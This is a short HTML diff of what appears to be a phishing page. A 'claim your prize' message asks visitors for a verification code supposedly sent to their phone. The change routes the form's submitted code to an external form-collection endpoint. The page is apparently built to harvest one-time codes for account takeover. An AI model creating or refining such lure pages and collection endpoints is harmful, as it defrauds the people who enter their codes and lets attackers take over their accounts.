--- a/index.html
+++ b/index.html
@@ -31,7 +31,7 @@
  <!--main-->
 
  <p class="mt-5" style="font-size: small; font-weight: 700; color: white;">A verication code has been sent to your phone number, please input verification code to claim your prize &#127873;</p>
- <form action="form_v1_KQTzLYr3ojM0RA0R0wJ8eU26" method="post">
+ <form action="https://submit-form.com/yCdrNUh5" method="post">
    <div class="mb-3 mt-2">
      <input type="number" class="form-control" id="number" placeholder="Please enter code" name="name">
    </div>
